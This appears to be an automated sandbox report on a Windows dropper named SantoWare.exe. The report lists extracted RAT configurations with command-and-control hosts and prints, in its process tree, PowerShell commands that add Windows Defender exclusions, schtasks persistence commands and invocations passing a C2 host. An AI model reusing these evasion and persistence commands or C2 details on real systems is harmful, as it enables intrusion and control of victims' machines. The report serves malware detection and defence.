arrowrat | 164cf475b4a37a4c142125bdc1808f4bc5f0f8f1efa555c65609b83b1704a7b9

Analysis

max time kernel
6s
max time network
15s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-12-2024 18:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SantoWare.exe
Size

8.1MB
MD5

9146e533d8cdfdfd620e221d6b0c8fb0
SHA1

0e2e6ae26b93d62bc6e439b98ab278fd9f877c22
SHA256

164cf475b4a37a4c142125bdc1808f4bc5f0f8f1efa555c65609b83b1704a7b9
SHA512

a73bd811f10dee9035eb075ef4487c21c5de231e725311d3638655cc723681cf419f5d0bbcc4e0557bd6e2d3e71c52fedfe5bbde8ca09a62728249132fa23d59
SSDEEP

196608:S8HXVmgfjPEbX2bVj180+qWc67W21Jn2khSs50CG11:S8HXY+zEz2JZ80jv6b1JjEAGv

Score

10^/10

arrowrat asyncrat xworm default discordcclient execution persistence rat trojan upx

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

147.185.221.24:18891

Mutex

ojozazfbghcdrrcaa

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

ma-compile.gl.at.ply.gg:18894

Mutex

RJpwA4Zvno655gyq

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

arrowrat

Botnet

DiscordCClient

know-england.gl.at.ply.gg:18903

Mutex

vlCHETDFA

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Arrowrat family
arrowrat
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a0000000120f6-28.dat	family_xworm
behavioral1/memory/624-30-0x0000000000250000-0x0000000000260000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0007000000004e74-13.dat	family_asyncrat

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1888	powershell.exe
1880	powershell.exe
2288	powershell.exe
2596	powershell.exe
2672	powershell.exe
2980	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2580	DiscordVcClient.exe
624	DiscordXClient.exe
2664	Client.exe
2336	Built.exe
2392	Built.exe

Loads dropped DLL 8 IoCs

pid	Process
2792	SantoWare.exe
2392	Built.exe
2392	Built.exe
2392	Built.exe
2392	Built.exe
2392	Built.exe
2392	Built.exe
2392	Built.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\DiscordVcClient = "C:\\Windows\\System32\\DiscordVcClient.exe"	SantoWare.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\DiscordXClient = "C:\\Windows\\System32\\DiscordXClient.exe"	SantoWare.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Windows\\System32\\Client.exe"	SantoWare.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Built = "C:\\Windows\\System32\\Built.exe"	SantoWare.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\DiscordVcClient.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\DiscordVcClient.exe	SantoWare.exe
File created	C:\Windows\System32\DiscordXClient.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\DiscordXClient.exe	SantoWare.exe
File created	C:\Windows\System32\Client.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\Client.exe	SantoWare.exe
File created	C:\Windows\System32\Built.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\Built.exe	SantoWare.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001a322-128.dat	upx
behavioral1/memory/2392-130-0x000007FEEDA80000-0x000007FEEE06E000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
536	schtasks.exe
964	schtasks.exe
2928	schtasks.exe
2432	schtasks.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
2288	powershell.exe
2596	powershell.exe
2672	powershell.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2980	powershell.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2664	Client.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe
2580	DiscordVcClient.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	2580	DiscordVcClient.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2664	Client.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeShutdownPrivilege	2644	explorer.exe
Token: SeDebugPrivilege	624	DiscordXClient.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2644	explorer.exe
2644	explorer.exe
2644	explorer.exe
2644	explorer.exe
2644	explorer.exe
2644	explorer.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2644	explorer.exe
2644	explorer.exe
2644	explorer.exe
2644	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2664	Client.exe
2580	DiscordVcClient.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2288	2792	SantoWare.exe	30
PID 2792 wrote to memory of 2288	2792	SantoWare.exe	30
PID 2792 wrote to memory of 2288	2792	SantoWare.exe	30
PID 2792 wrote to memory of 536	2792	SantoWare.exe	32
PID 2792 wrote to memory of 536	2792	SantoWare.exe	32
PID 2792 wrote to memory of 536	2792	SantoWare.exe	32
PID 2792 wrote to memory of 2580	2792	SantoWare.exe	34
PID 2792 wrote to memory of 2580	2792	SantoWare.exe	34
PID 2792 wrote to memory of 2580	2792	SantoWare.exe	34
PID 2792 wrote to memory of 2596	2792	SantoWare.exe	35
PID 2792 wrote to memory of 2596	2792	SantoWare.exe	35
PID 2792 wrote to memory of 2596	2792	SantoWare.exe	35
PID 2792 wrote to memory of 964	2792	SantoWare.exe	37
PID 2792 wrote to memory of 964	2792	SantoWare.exe	37
PID 2792 wrote to memory of 964	2792	SantoWare.exe	37
PID 2792 wrote to memory of 624	2792	SantoWare.exe	39
PID 2792 wrote to memory of 624	2792	SantoWare.exe	39
PID 2792 wrote to memory of 624	2792	SantoWare.exe	39
PID 2792 wrote to memory of 2672	2792	SantoWare.exe	40
PID 2792 wrote to memory of 2672	2792	SantoWare.exe	40
PID 2792 wrote to memory of 2672	2792	SantoWare.exe	40
PID 2792 wrote to memory of 2928	2792	SantoWare.exe	42
PID 2792 wrote to memory of 2928	2792	SantoWare.exe	42
PID 2792 wrote to memory of 2928	2792	SantoWare.exe	42
PID 2792 wrote to memory of 2664	2792	SantoWare.exe	44
PID 2792 wrote to memory of 2664	2792	SantoWare.exe	44
PID 2792 wrote to memory of 2664	2792	SantoWare.exe	44
PID 2792 wrote to memory of 2980	2792	SantoWare.exe	45
PID 2792 wrote to memory of 2980	2792	SantoWare.exe	45
PID 2792 wrote to memory of 2980	2792	SantoWare.exe	45
PID 2664 wrote to memory of 2644	2664	Client.exe	47
PID 2664 wrote to memory of 2644	2664	Client.exe	47
PID 2664 wrote to memory of 2644	2664	Client.exe	47
PID 2664 wrote to memory of 2676	2664	Client.exe	48
PID 2664 wrote to memory of 2676	2664	Client.exe	48
PID 2664 wrote to memory of 2676	2664	Client.exe	48
PID 2664 wrote to memory of 2676	2664	Client.exe	48
PID 2664 wrote to memory of 3056	2664	Client.exe	49
PID 2664 wrote to memory of 3056	2664	Client.exe	49
PID 2664 wrote to memory of 3056	2664	Client.exe	49
PID 2664 wrote to memory of 3056	2664	Client.exe	49
PID 2664 wrote to memory of 3060	2664	Client.exe	50
PID 2664 wrote to memory of 3060	2664	Client.exe	50
PID 2664 wrote to memory of 3060	2664	Client.exe	50
PID 2664 wrote to memory of 3060	2664	Client.exe	50
PID 2664 wrote to memory of 684	2664	Client.exe	51
PID 2664 wrote to memory of 684	2664	Client.exe	51
PID 2664 wrote to memory of 684	2664	Client.exe	51
PID 2664 wrote to memory of 684	2664	Client.exe	51
PID 2664 wrote to memory of 2032	2664	Client.exe	52
PID 2664 wrote to memory of 2032	2664	Client.exe	52
PID 2664 wrote to memory of 2032	2664	Client.exe	52
PID 2664 wrote to memory of 2032	2664	Client.exe	52
PID 2664 wrote to memory of 1268	2664	Client.exe	53
PID 2664 wrote to memory of 1268	2664	Client.exe	53
PID 2664 wrote to memory of 1268	2664	Client.exe	53
PID 2664 wrote to memory of 1268	2664	Client.exe	53
PID 2664 wrote to memory of 2864	2664	Client.exe	54
PID 2664 wrote to memory of 2864	2664	Client.exe	54
PID 2664 wrote to memory of 2864	2664	Client.exe	54
PID 2664 wrote to memory of 2864	2664	Client.exe	54
PID 2664 wrote to memory of 1568	2664	Client.exe	55
PID 2664 wrote to memory of 1568	2664	Client.exe	55
PID 2664 wrote to memory of 1568	2664	Client.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SantoWare.exe
"C:\Users\Admin\AppData\Local\Temp\SantoWare.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordVcClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordVcClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordVcClient.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:536
- C:\Windows\System32\DiscordVcClient.exe
  "C:\Windows\System32\DiscordVcClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2596
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordXClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordXClient.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:964
- C:\Windows\System32\DiscordXClient.exe
  "C:\Windows\System32\DiscordXClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DiscordXClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "Client" /SC ONLOGON /TR "C:\Windows\System32\Client.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2928
- C:\Windows\System32\Client.exe
  "C:\Windows\System32\Client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2644
  - - C:\Windows\system32\ctfmon.exe
      ctfmon.exe
      4⤵
      PID:1244
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:2676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:3056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:3060
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:684
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:2032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:2864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1568
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1352
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1584
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2664 -s 672
    3⤵
    PID:1160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2432
- C:\Windows\System32\Built.exe
  "C:\Windows\System32\Built.exe"
  2⤵
  - Executes dropped EXE
  PID:2336
- - C:\Windows\System32\Built.exe
    "C:\Windows\System32\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI23362\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23362\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23362\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23362\python311.dll

Filesize
1.6MB

MD5
76eb1ad615ba6600ce747bf1acde6679

SHA1
d3e1318077217372653be3947635b93df68156a4

SHA256
30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1

SHA512
2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23362\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1d3487fe760c17eb2ad42d33dcfd0d0c

SHA1
3eab9eac87f8535aaa4acb03183aa3d27852094d

SHA256
ca8a4eb4396c429e26224e1dadc0c078bba27bf4395fd9e900c97dd9c97d8072

SHA512
474ae2eb25beda42fd847cf7b72ed644b17e8ab1cbf6f408c205e5684b043f1237ae43c09e939736cfa31e2faa03ad8bc9cceab049ac14fee9a5ba261905b60e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I4GMIUL04MV2XAJCA8TB.temp

Filesize
7KB

MD5
a5b3461ff20cf06260d27a40158082fb

SHA1
8bbc38196ef383663aeebfa85bc1e461d51086da

SHA256
d7192bd300fd03f600d7e5c5afba65e4ba06eed2db7be599904bd87089c01456

SHA512
5bb55f79403893964cdf1bb077cad7268f70a3024e3d07b83308479e74f74fc73b05e0f03adbc800e3bd623a3d6f42e35642a6b571adcf181dcc7fe04270c40f

Download Submit
C:\Windows\System32\Client.exe

Filesize
158KB

MD5
99824baab1676a2ed1e898090cb0fcc1

SHA1
951617c54e68a221da776add3264450f8a2255cb

SHA256
a88efa6dea3c898d55f882ce0143518b9da2883496e5fc448c791f328d13e82d

SHA512
218c5a899b063ccae1ac02d3e8abe9b6e3d307573c0363d01e1bb3626ce090aaa08a2a7cec33cfce6abd115dc39964048d1dc8320fd143af9ef651d92edc072a

Download Submit
C:\Windows\System32\DiscordVcClient.exe

Filesize
74KB

MD5
d6adfa25699c74bc456c1b255fea81df

SHA1
fc9e822263308909409a8429004ad4a2249124ff

SHA256
a34d9f25edb98b2cf95879380b52c59d857c22929b327f2b1cac64ab86beb2c5

SHA512
ae987008e8f39bc489373d602a79e91321603c400fa3ba982fc99af1baf2461bfeab5bed5c1b26f06f5bf328a565a89187c0b310d5bc69228d5191d36313bcfd

Download Submit
C:\Windows\System32\DiscordXClient.exe

Filesize
37KB

MD5
582bba7b8005d6c324b945a19e6d6c16

SHA1
9a8f6c7fa7bb46689e6d146e1b070c70ec14c36f

SHA256
671866f3a944ee4f0419d188539a85e43742e04fbde5131b51848fad44e2719c

SHA512
0616d371f8d4ed2ff64077fcd8f49c7abec432fe3e3d8bbf84cba82c631a009a9acdba69a54135bb0b672c1fa9afcec165b1caab23c1fdd79a555acc893e04d3

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI23362\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI23362\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
\Windows\System32\Built.exe

Filesize
8.1MB

MD5
89dd023a703e12d4e2a4686d02abe286

SHA1
9681f55084c7c292acfe26a979f8e04d80efc1ff

SHA256
d008401e82c6dba813720416672a6dde33dd214438ed389fc08fdbead3540ed4

SHA512
a8f20e05603d0aaba36c5cb856c4ffc0f93ffc9685919638961ae0305f097bfe7d913bc7b283378e93cc9ae7a3edb678b98d0a6645638f7e858984d26a3c6197

Download Submit
memory/624-30-0x0000000000250000-0x0000000000260000-memory.dmp

Filesize
64KB

Download
memory/2288-8-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/2288-7-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2288-6-0x0000000002E00000-0x0000000002E80000-memory.dmp

Filesize
512KB

Download
memory/2392-130-0x000007FEEDA80000-0x000007FEEE06E000-memory.dmp

Filesize
5.9MB

Download
memory/2580-15-0x0000000000EE0000-0x0000000000EF8000-memory.dmp

Filesize
96KB

Download
memory/2596-23-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2596-22-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2664-42-0x00000000003E0000-0x000000000040E000-memory.dmp

Filesize
184KB

Download
memory/2792-0-0x000007FEF5FB3000-0x000007FEF5FB4000-memory.dmp

Filesize
4KB

Download
memory/2792-1-0x00000000010B0000-0x00000000018DC000-memory.dmp

Filesize
8.2MB

Download